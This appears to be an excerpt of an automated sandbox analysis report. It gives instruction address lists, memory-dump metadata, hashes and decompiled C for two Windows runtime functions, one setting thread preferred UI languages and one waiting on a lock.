0x05295b6f
0x05295b7f
0x05295b89
0x05295b8e
0x05295b93
0x05295b96
0x05295b9c
0x05295ba0
0x05295ba3
0x05295bab
0x05295bb0
0x05295bb3
0x05295bb3
0x05295ba3
0x05252724
0x05252726
0x05252729
0x0525272c
0x0525279d
0x0525279d
0x052527a0
0x052527a2
0x00000000
0x0525272e
0x0525272e
0x05252731
0x05252734
0x05252734
0x05252736
0x05295bc1
0x05295bc1
0x05295bc4
0x00000000
0x05295bca
0x05295bca
0x05295bcd
0x00000000
0x05295bd3
0x00000000
0x05295bd3
0x05295bcd
0x0525273c
0x0525273c
0x05252742
0x05252747
0x0525274a
0x0525274d
0x05252750
0x00000000
0x05252756
0x05252756
0x00000000
0x05252902
0x05252908
0x0525290b
0x00000000
0x05252911
0x0525291c
0x05252921
0x00000000
0x05252921
0x00000000
0x00000000
0x05252880
0x05252887
0x0525288c
0x00000000
0x00000000
0x05252805
0x0525280a
0x05252814
0x05252816
0x00000000
0x00000000
0x0525281e
0x05252821
0x05252823
0x00000000
0x05252829
0x05252829
0x05252831
0x0525283c
0x0525283e
0x00000000
0x0525283e
0x00000000
0x00000000
0x0525284e
0x05252850
0x05252851
0x05252854
0x05252857
0x0525285a
0x0525285c
0x0525285d
0x00000000
0x00000000
0x0525275d
0x05252761
0x00000000
0x05252767
0x0525276e
0x05252773
0x05252773
0x05252776
0x05252778
0x0525277e
0x0525277e
0x05252781
0x05252781
0x05252783
0x05252784
0x00000000
0x00000000
0x05295bd8
0x05295bde
0x05295be4
0x05295be6
0x05295be8
0x05295be9
0x05295bee
0x05295bf8
0x05295bff
0x05295c01
0x05295c04
0x05295c07
0x05295c0b
0x05295c0d
0x05295c0d
0x05295c15
0x05295c18
0x05295c1b
0x05295c1b
0x05295c1e
0x00000000
0x00000000
0x052528c3
0x052528c8
0x052528d2
0x052528d4
0x052528d8
0x052528db
0x05295c26
0x05295c28
0x05295c2d
0x05295c2d
0x00000000
0x00000000
0x05295c34
0x05295c36
0x05295c49
0x05295c4e
0x05295c54
0x05295c5b
0x05295c5d
0x05295c60
0x05252788
0x05252788
0x0525278b
0x0525278e
0x0525278e
0x0525278e
0x05252791
0x00000000
0x00000000
0x05252756
0x05252750
0x00000000
0x05252794
0x05252794
0x05252795
0x05252798
0x05252798
0x00000000
0x05252734
0x0525272c
0x05252700
0x052525ef
0x052525ef
0x052525ef
0x052525f2
0x052525f8
0x00000000
0x00000000
0x052525fe
0x00000000
0x052528e6
0x052528ec
0x052528ef
0x052528f5
0x052528f8
0x052528f8
0x00000000
0x052528f8
0x00000000
0x00000000
0x05252866
0x05252866
0x05252876
0x05252879
0x00000000
0x00000000
0x052527e0
0x052527e7
0x052527e9
0x052527eb
0x05295afd
0x00000000
0x05295afd
0x00000000
0x00000000
0x05252633
0x05252638
0x0525263b
0x0525263c
0x0525263e
0x05252640
0x05252642
0x05252647
0x05252649
0x0525264e
0x05252650
0x05252653
0x05252659
0x052526a2
0x052526a7
0x052526ac
0x052526b2
0x05295b11
0x05295b15
0x05295b17
0x00000000
0x052526b8
0x052526b8
0x052526ba
0x052527a6
0x052527a6
0x052527a9
0x052527ab
0x052527b9
0x052527b9
0x052527be
0x052527c1
0x052527c3
0x052527c5
0x052527c7
0x05295c74
0x05295c79
0x05295c79
0x052527c7
0x00000000
0x052526c0
0x052526c0
0x052526c3
0x052526c6
0x052526c6
0x052526c9
0x052526c9
0x00000000
0x052526c9
0x052526ba
0x0525265b
0x0525265b
0x0525265e
0x05252667
0x0525266d
0x05252677
0x0525267c
0x0525267f
0x05252681
0x05295b49
0x05295b4e
0x052527cd
0x052527d0
0x052527d1
0x052527d2
0x052527d4
0x052527dd
0x05252687
0x05252687
0x0525268a
0x0525268b
0x0525268e
0x0525268f
0x05252691
0x05252696
0x05252698
0x0525269d
0x0525269f
0x00000000
0x0525269f
0x05252681
0x00000000
0x00000000
0x05252846
0x00000000
0x00000000
0x05252605
0x0525260a
0x0525260c
0x05252611
0x05252616
0x05252619
0x05252619
0x0525261e
0x00000000
0x05252624
0x05252627
0x05252627
0x00000000
0x00000000
0x05295b1f
0x00000000
0x00000000
0x05252894
0x0525289b
0x0525289d
0x052528a1
0x05295b2b
0x05295b2e
0x05295b2e
0x052528a7
0x052528a9
0x05295b04
0x05295b09
0x05295b09
0x05295b09
0x00000000
0x00000000
0x05295b35
0x05295b3c
0x052528fb
0x052528fb
0x052526cc
0x052526cc
0x052526d0
0x00000000
0x052526d2
0x052526d2
0x00000000
0x052526d2
0x00000000
0x00000000
0x052525fe
0x0525292d
0x05252930
0x05252935
0x05252948
0x0525294d
0x0525294e
0x0525294f
0x0525295a
0x05252960
0x05252965
0x05252966
0x05252971
0x0525297b
0x05252981
0x05252982
0x05252983
0x05252984
0x05252985
0x05252986
0x05252987
0x05252988
0x05252989
0x0525298a
0x0525298b
0x0525298c
0x0525298d
0x0525298e
0x0525298f
0x05252990
0x05252992
0x05252997
0x052529a3
0x052529a6
0x052529ab
0x052529ad
0x052529b0
0x052529b2
0x05295c80
0x052529b8
0x052529b8
0x052529bb
0x052529c0
0x052529c5
0x052529c6
0x052529c6
0x052529c9
0x052529cb
0x00000000
0x00000000
0x052529cd
0x052529d0
0x052529d9
0x052529db
0x052529dd
0x05252a7f
0x05252a84
0x05252a87
0x05252a89
0x05295ca1
0x05295ca3
0x00000000
0x05252a8f
0x05252a8f
0x00000000
0x05252a8f
0x00000000
0x052529e3
0x052529e3
0x052529e3
0x00000000
0x052529e3
0x052529dd
0x00000000
0x052529db
0x052529e6
0x052529e9
0x052529eb
0x052529ed
0x052529f3
0x052529f5
0x052529f8
0x052529fa
0x05252a97
0x05252a9a
0x05252a9d
0x05252add
0x00000000
0x05252a9f
0x05252aa2
0x05252aa5
0x05252aa8
0x05252aab
0x05295cab
0x05295caf
0x05295cc5
0x05295cda
0x05295cdc
0x05295cdf
0x05295ce5
0x00000000
0x05295ceb
0x05295ced
0x05295cee
0x00000000
0x05295cee
0x05295cb1
0x05295cb4
0x05295cb9
0x05295cbb
0x00000000
0x05295cbd
0x05295cbd
0x00000000
0x05295cbd
0x05295cbb
0x05252ab1
0x05252ab1
0x05252ac4
0x05252ac6
0x05252ac6
0x00000000
0x05252ac6
0x05252aab
0x00000000
0x05252a00
0x05252a09
0x05252a0e
0x05252a21
0x05252a24
0x05252a35
0x05252a3a
0x05252a3d
0x05252a42
0x05252a59
0x05252a59
0x05252a5c
0x05252a5f
0x05252a5f
0x052529fa
0x052529f3
0x05252a64
0x05252a64
0x05252a6b
0x05252a6b
0x05252a6d
0x05252a72
0x05252a72
0x00000000

Strings

PATH, xrefs: 05252642, 05252691

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: bffcde5f8ef4379fc0e5295a32c45d2d2fe307c4be3beb77c2024bdc1f30d2a0
Instruction ID: 9dde63915de2113277cb012cffc761df9437df4bd06766057728dd52f131d0b0
Opcode Fuzzy Hash: bffcde5f8ef4379fc0e5295a32c45d2d2fe307c4be3beb77c2024bdc1f30d2a0
Instruction Fuzzy Hash: ACC1B375E20219DBCB15DFA8D881BBDB7B5FF48720F444029E805BB390DB74A945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0525FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0525FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0523EEF0(0x5317b60);
					_t134 =  *0x5317b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x5317b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x5317b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E05236D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E052376E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E052C8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0522B150();
													}
													_t116 = E052C6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E052375CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x5318638; // 0x1151aa0
																	_t122 = L052338A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E052376E2(_t154);
																			goto L41;
																		}
																	} else {
																		E052376E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0525FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L052370F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0525FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0525FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0525FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0525FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0525FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x5317b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x5317b84 = _t75;
						_t73 = E0523EB70(_t134, 0x5317b60);
						if( *0x5317b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0523FF60( *0x5317b20);
							}
						}
						goto L5;
					}
				}
			}

0x0525fab0
0x0525fab2
0x0525fab3
0x0525fab4
0x0525fabc
0x0525fac0
0x0525fb14
0x0525fb17
0x0525fac2
0x0525fac8
0x0525facd
0x0525fad3
0x0525fad3
0x0525fadd
0x0525fb18
0x0525fb1b
0x0525fb1d
0x0525fb1e
0x0525fb1f
0x0525fb20
0x0525fb21
0x0525fb22
0x0525fb23
0x0525fb24
0x0525fb25
0x0525fb26
0x0525fb27
0x0525fb28
0x0525fb29
0x0525fb2a
0x0525fb2b
0x0525fb2c
0x0525fb2d
0x0525fb2e
0x0525fb2f
0x0525fb3a
0x0525fb3b
0x0525fb3e
0x0525fb41
0x0525fb44
0x0525fb47
0x0525fb4a
0x0525fb4d
0x0525fb53
0x0529bdcb
0x0529bdcb
0x0525fb59
0x0525fb5b
0x0525fb5b
0x0525fb5e
0x0529bdd5
0x0529bdd8
0x00000000
0x0529bdda
0x00000000
0x0529bdda
0x0525fb64
0x0525fb64
0x0525fb64
0x0525fb67
0x0525fb6e
0x0525fb70
0x0525fb72
0x00000000
0x0525fb78
0x0525fb7a
0x0525fb7a
0x0525fb7d
0x0525fb80
0x0529bddf
0x0529bde1
0x00000000
0x0529bde3
0x00000000
0x0529bde3
0x0525fb86
0x0525fb86
0x0525fb86
0x0525fb8b
0x0525fb90
0x0525fb92
0x0525fb94
0x0525fb9a
0x0525fb9b
0x0525fba1
0x0529bde8
0x0529bdeb
0x0529bded
0x0529beb5
0x0529beb5
0x0529bebb
0x0529bebd
0x0529bec3
0x0529bed2
0x0529bedd
0x0529bedd
0x0529beed
0x00000000
0x0529bdf3
0x0529bdfe
0x0529be06
0x0529be0b
0x0529be0d
0x0529be0f
0x0529be14
0x0529be19
0x0529be20
0x0529be25
0x0529be27
0x0529be35
0x0529be39
0x0529be46
0x0529be4f
0x0529be54
0x0529be56
0x0529bef8
0x0529bef8
0x00000000
0x0529be5c
0x0529be5c
0x0529be60
0x00000000
0x0529be66
0x0529be66
0x0529be7f
0x0529be84
0x0529be87
0x0529be89
0x0529be8b
0x0529be99
0x0529be9d
0x0529bea0
0x0529beac
0x0529beaf
0x0529beb1
0x0529beb3
0x0529beb3
0x00000000
0x0529bea2
0x0529bea2
0x00000000
0x0529bea2
0x0529be8d
0x0529be8d
0x0529be92
0x00000000
0x0529be92
0x0529be8b
0x0529be60
0x0529be3b
0x0529be3b
0x0529be3e
0x00000000
0x0529be40
0x0529be40
0x0529be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0529be44
0x0529be3e
0x0529be29
0x0529be29
0x00000000
0x0529be29
0x0529be27
0x00000000
0x0525fba7
0x0525fba7
0x0525fbab
0x0529bf02
0x0525fbb1
0x0525fbb1
0x0525fbb8
0x0525fbbd
0x0525fbbd
0x0525fbbf
0x0525fbbf
0x0525fbc5
0x0525fbcb
0x0525fbf8
0x0525fbf8
0x0525fbfa
0x00000000
0x0525fc00
0x0525fc00
0x0525fc03
0x00000000
0x0525fc09
0x0525fc09
0x0525fc0f
0x0525fc15
0x0525fc23
0x0525fc23
0x0525fc25
0x0525fc27
0x0525fc75
0x0525fc7c
0x0525fc84
0x00000000
0x0525fc29
0x0525fc29
0x0525fc2d
0x0525fc30
0x0529bf0f
0x00000000
0x0525fc36
0x0525fc38
0x0525fc3b
0x0525fc41
0x0529bf17
0x0529bf19
0x0529bf48
0x0529bf4b
0x00000000
0x0529bf1b
0x0529bf22
0x0529bf24
0x0529bf26
0x00000000
0x0529bf2c
0x0529bf37
0x0529bf39
0x0529bf3b
0x00000000
0x0529bf41
0x0529bf41
0x0529bf41
0x0529bf41
0x0529bf45
0x00000000
0x0529bf45
0x0529bf3b
0x0529bf26
0x00000000
0x0525fc47
0x0525fc47
0x0525fc49
0x0525fcb2
0x0525fcb4
0x0525fcb6
0x0525fcdc
0x0525fcdc
0x00000000
0x0525fcb8
0x0525fcc3
0x0525fcc5
0x0525fcc7
0x00000000
0x0525fcc9
0x0525fcc9
0x0525fccd
0x00000000
0x0525fccd
0x0525fcc7
0x00000000
0x0525fc4b
0x0525fc4b
0x0525fc4e
0x0525fc4e
0x0525fc51
0x0525fc51
0x0525fc54
0x0525fc5a
0x0525fc5c
0x0525fc5f
0x0525fc61
0x0525fc63
0x0525fc65
0x0525fc67
0x0525fc6e
0x0525fc72
0x0525fc72
0x0525fc72
0x0525fc72
0x0525fc67
0x0525fc61
0x00000000
0x0525fc5a
0x0525fc49
0x0525fc41
0x0525fc30
0x0525fc27
0x0525fc03
0x0525fbcd
0x0525fbd3
0x0525fbd9
0x0525fbdc
0x0525fbde
0x0525fc99
0x0525fc9b
0x0525fc9d
0x0525fcd5
0x0525fcd5
0x0525fc89
0x0525fc89
0x00000000
0x0525fc9f
0x0525fc9f
0x0525fca3
0x00000000
0x0525fca3
0x00000000
0x0525fbe4
0x0525fbe4
0x0525fbe4
0x0525fbe4
0x0525fbe9
0x0525fbf2
0x00000000
0x0525fbf2
0x0525fbde
0x0525fbcb
0x0525fbab
0x0525fc8b
0x0525fc8b
0x0525fc8c
0x0525fb80
0x0525fb72
0x0525fb5e
0x0525fc8d
0x0525fc91
0x0525fadf
0x0525fadf
0x0525fae1
0x0525fae4
0x0525fae7
0x0525faec
0x0525faf8
0x0525fb00
0x0525fb07
0x0525fb0f
0x0525fb0f
0x0525fb07
0x00000000
0x0525faf8
0x0525fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0529BE0F

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 0f324cc17bd3cbad4f6a3dc96a52e08fb076eea5fb98a64dc058475c6cc58b6e
Instruction ID: dc4a1c284eeaaeb3424e1fe33787bac40317c1ce4b91f86c1de1d4fb7cc7d803
Opcode Fuzzy Hash: 0f324cc17bd3cbad4f6a3dc96a52e08fb076eea5fb98a64dc058475c6cc58b6e
Instruction Fuzzy Hash: 1FA1F4B2B34606CBDB25DB64C654B7AB3AABF48721F04457DEC4ACB780DB74D8418B90

Uniqueness

Uniqueness Score: -1.00%

Function 05222D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E05222D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x5315350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x5317bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E052697C0();
				}
				if( *0x53179c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x53179c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E05251624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E05247D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E052BFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E05269520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0525E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0527DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x5316901;
								_push(_t109);
								_v52 = _t98;
								if( *0x5316901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E05269980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E052695D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E05247D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E05247D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E052A7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E052BFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x5315350;
							if(_t109 != 0x5315350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E052BFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E052B5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x05222d8a
0x05222d8a
0x05222d92
0x05222d96
0x05222d9e
0x05222da0
0x05222da3
0x05222da5
0x05222da8
0x05222dab
0x05222db2
0x0527f9aa
0x0527f9ab
0x0527f9ae
0x0527f9ae
0x05222db8
0x05222dc2
0x0527f9b9
0x0527f9be
0x0527f9bf
0x0527f9bf
0x05222dcf
0x0527f9c9
0x05222dd5
0x05222dd5
0x05222dd5
0x05222dde
0x05222de1
0x05222e70
0x05222e72
0x05222e72
0x05222de7
0x05222deb
0x05222e7c
0x05222e83
0x05222e85
0x05222e8b
0x05222e8d
0x05222e92
0x05222e92
0x05222e85
0x05222df1
0x05222df7
0x05222df9
0x05222df9
0x05222dfc
0x05222dff
0x05222e02
0x00000000
0x05222e05
0x05222e0c
0x0527f9d9
0x05222e12
0x05222e12
0x05222e12
0x05222e1a
0x0527f9e3
0x0527f9e9
0x0527f9f0
0x0527f9f6
0x0527f9f8
0x0527f9f8
0x0527f9f0
0x05222e23
0x0527fa02
0x0527fa03
0x0527fa05
0x0527fa06
0x00000000
0x05222e29
0x05222e29
0x05222e2e
0x05222e34
0x05222e3e
0x00000000
0x00000000
